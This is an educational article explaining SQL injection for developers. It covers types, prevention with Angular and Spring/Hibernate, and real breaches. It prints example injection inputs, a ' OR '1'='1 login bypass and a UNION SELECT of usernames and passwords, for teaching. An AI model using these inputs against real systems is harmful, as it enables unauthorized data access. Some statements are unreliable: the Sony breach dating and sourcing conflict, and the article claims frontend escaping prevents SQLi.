OWASP Top 10 Explained: SQL Injection

Cyberattacks are a common and permanent threat. This paper is the first in a series about cybersecurity.

The aim is to provide software engineers with an understanding of the main threats and how to address them. Most exploits are based on basic errors.

According to the OWASP top 10 report [1], injection remains in the top three threats. However, it is important to note that the report covers more than just SQL injection [2]. It also includes:

• CWE-79: Cross-site Scripting
• CWE-89: SQL Injection
• CWE-73: External Control of File Name or Path

Here we will focus on SQL Injections, their types, how to prevent them, and some real-world examples.

Table of Contents

1. What is an SQL Injection?
2. A basic example
3. The different types
   3.1 In-band SQLi
   3.2 Inferential SQLi
   3.3 Out-of-band SQLi
4. Prevention
   4.1 Prevention in Frontend
   4.2 Prevention in Backtend
5. Real-Life SQLi Examples
   5.1 Sony
   5.2 Tesla
   5.3 Cisco
   5.4 Fortnite
6. Conclusion
7. Sources

1. What Is an SQL Injection?

SQL Injection (SQLi) is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.

The vulnerability is present when user inputs are either improperly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

This allows an attacker to manipulate SQL queries, enabling them to unauthorized access, modify, and delete data in the database. This can lead to significant breaches of confidentiality, integrity, and availability, ranging from unauthorized viewing of data to complete database compromise.

2. A Basic Example

Consider a simple web application that uses a SQL database to store user information. Users log in to the application by entering their username and password, which the application checks by running a SQL query:

SELECT * FROM users WHERE username = '[username]' AND password = '[password]';

An attacker could exploit this by entering a username that always returns true, such as "bash".

' OR '1'='1

If the application directly concatenates this input into a SQL query without proper sanitization, the resulting query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '[password]';

Since '1'='1' is always true, the query returns all rows from the users table, effectively bypassing the authentication mechanism.

This is a very simple example to illustrate what is the basic idea behind an SQL Injection.

3. The Different Types

There are three main types of SQLi: In-band, Inferential, and Out-of-band.

3.1. In-Band

This type of SQL Injection leverages the same communication channel to launch the attack and gather results [3].

Tautologies

To trick a conditional return and gain access to unauthorized data, one can use a statement that is always true.

' OR '1'='1

Union Queries

The aim is to utilize the UNION keyword to add a new query for retrieving additional data.

SELECT title, author FROM books WHERE title LIKE '%[user_input]%';

Injected query:

' UNION SELECT username, password FROM users 

Error-Based

The attacker is attempting to obtain information about the database structure by exploiting error messages. This is a form of malicious reverse engineering.

3.2 Inferential (Blind-SQLi)

This attack occurs when an attacker sends data payloads to the server and observes the response or behavior of the server to learn about its structure. The attack is called “blind” because the attacker cannot see the result of the executed query directly, and no data are exchanged [3].

Boolean-Based

The attacker sends a specific query to obtain a boolean response. Based on these responses, the attacker tries to enumerate the data structure.

Time-Based

This is a blind attack that delays query execution to infer database structure from the response time.

3.3. Out-of-Band

This type of attack is used when an attacker is unable to use the same channel to both launch the attack and gather information or when the server is too slow or unstable. It relies on the server’s ability to make DNS or HTTP requests to transmit data to an attacker [3].

4. Prevention

In modern web applications, an injection can occur at many different levels and will be handled differently depending on the language, framework, or transport protocol used at each level.

Your UI and APIs are the most exposed parts of your web application. They are often accessible on the internet, and even if they are protected with authentication protocols and authorization levels, they are still the most vulnerable.

4.1 Prevention in Frontend

In modern web development, frameworks like Angular provide built-in features to prevent SQL Injection, primarily by separating the code from the data. This separation ensures that user inputs are handled in a way that mitigates the risk of inadvertently executing malicious SQL code [4].

Example: Angular Data Binding

Angular employs data binding techniques that automatically handle the encoding and management of user inputs, thus preventing the injection of executable code into the application. Consider a simple form input bound to a model property:

<input [(ngModel)]="userInput" type="text">

// Component code
userInput: string;

Angular treats userInputas text rather than executable code, allowing for effective input sanitization.

Example: HTTPClient and Parameterized APIs

When making HTTP requests, Angular’s HttpClient service automatically escapes query parameters, reducing the risk of SQL Injection attacks originating from the front end. Consider the following example where user input is sent to a server-side API:

searchProducts(searchTerm: string): Observable<Product[]> {
  const params = new HttpParams().set('query', searchTerm);
  return this.httpClient.get<Product[]>('/api/products/search', { params });
}

In this case, HttpParams ensures that searchTerm is correctly encoded, preventing any attempt to inject SQL code through the front end.

4.2 Prevention in Backend

For backend prevention, frameworks like Spring and Hibernate provide robust mechanisms to control inputs from APIs, enhancing security against SQL injection [4].

Input Validation

Spring’s approach centers on using @RequestParam or @PathVariable annotations to strictly control input types and employ Spring Security for comprehensive input validation.

Spring Data JPA Repositories

Spring Data JPA repositories abstract the complexity of direct database interactions, using Hibernate to prevent SQL Injection. Here’s an example of a repository method that finds a user by username:

public interface UserRepository extends JpaRepository<User, Long> {
  User findByUsername(String username);
}

Spring Data JPA automatically translates this method into a SQL query that uses prepared statements, ensuring that username is treated as a parameter, not part of the SQL command itself.

Hibernate

Hibernate, on the other hand, emphasizes the use of HQL (Hibernate Query Language) with named parameters to prevent the direct inclusion of user inputs in queries, thereby safeguarding against injection attacks [4].

Here’s a simplified example using HQL with named parameters:

// Unsafe HQL Statement
String hql = "FROM Inventory WHERE productId = '" + userInput + "'";

// Safe HQL using named parameters
String safeHql = "FROM Inventory WHERE productId = :productId";
Query query = session.createQuery(safeHql);
query.setParameter("productId", userInput);

This approach ensures that user inputs are handled safely, effectively preventing SQL injection by separating code from data within the query execution process.

5. Real-Life SQLi Examples

5.1 Sony Pictures (2011)

In 2011, Sony Pictures faced a significant cybersecurity breach, with the attack compromising about 77 million PlayStation Network accounts and unveiling users’ personal information. As reported by The Washington Post, this incident resulted in around $170 million in financial losses for Sony. This episode not only demonstrated the susceptibility of advanced digital networks to cyber threats like SQL Injection but also underscored the urgent need for stringent cybersecurity measures across the digital entertainment sector to protect user data [5].

5.2 Tesla (2014)

In 2014, Tesla faced a security breach when researchers exploited an SQL Injection vulnerability on its website, obtaining administrative rights and accessing user data. This incident underscored the critical need for stringent web application security measures [6].

5.3 Cisco (2018)

Cisco’s Prime License Manager was compromised in 2018 due to a SQL injection vulnerability, allowing attackers shell access to systems. Cisco swiftly resolved the issue, highlighting the ongoing challenge of securing software against SQL injection attacks [7].

5.4 Fortnite (2019)

In 2019, Fortnite experienced a significant security breach. This incident involved a vulnerability within one of Epic Games’ subdomains, which attackers exploited to perform an SQL injection attack. This allowed unauthorized access to user accounts and their personal information. The breach underscored the importance of robust cybersecurity practices and the constant vigilance needed to protect digital assets and user data in the gaming industry [8].

6. Conclusion

SQL Injection (SQLi) represents a significant vulnerability that exposes web applications to various attacks, potentially leading to unauthorized data access or manipulation.

This detailed exploration has identified multiple SQLi types, including In-band, Inferential (Blind SQLi), and Out-of-band attacks, each with unique characteristics and exploitation techniques.

To combat these vulnerabilities, we’ve presented a range of preventative measures, leveraging modern frameworks and best practices such as input validation, parameterized queries, and the use of prepared statements.

These strategies are crucial for developers to implement, ensuring the security and integrity of their applications.

7. Sources

[1] : OWASP Top Ten Project: OWASP

[2] : Injection Flaws — OWASP Top 10 A03:2021: OWASP Injection

[3] : Academic Research on SQLi: JISRC, Sifisheriessciences

[4] : SQL Injection Prevention Cheat Sheet: OWASP Cheat Sheet

[5] : 2014 Sony Pictures Hack: Wikipedia

[6] : Tesla Motors Blind SQL Injection: Bitquark

[7] : Cisco Patches Prime License Manager SQL Injection Vulnerability: SC Magazine

[8] : Fortnite Account Hacked via SQL Injection: The Hacker News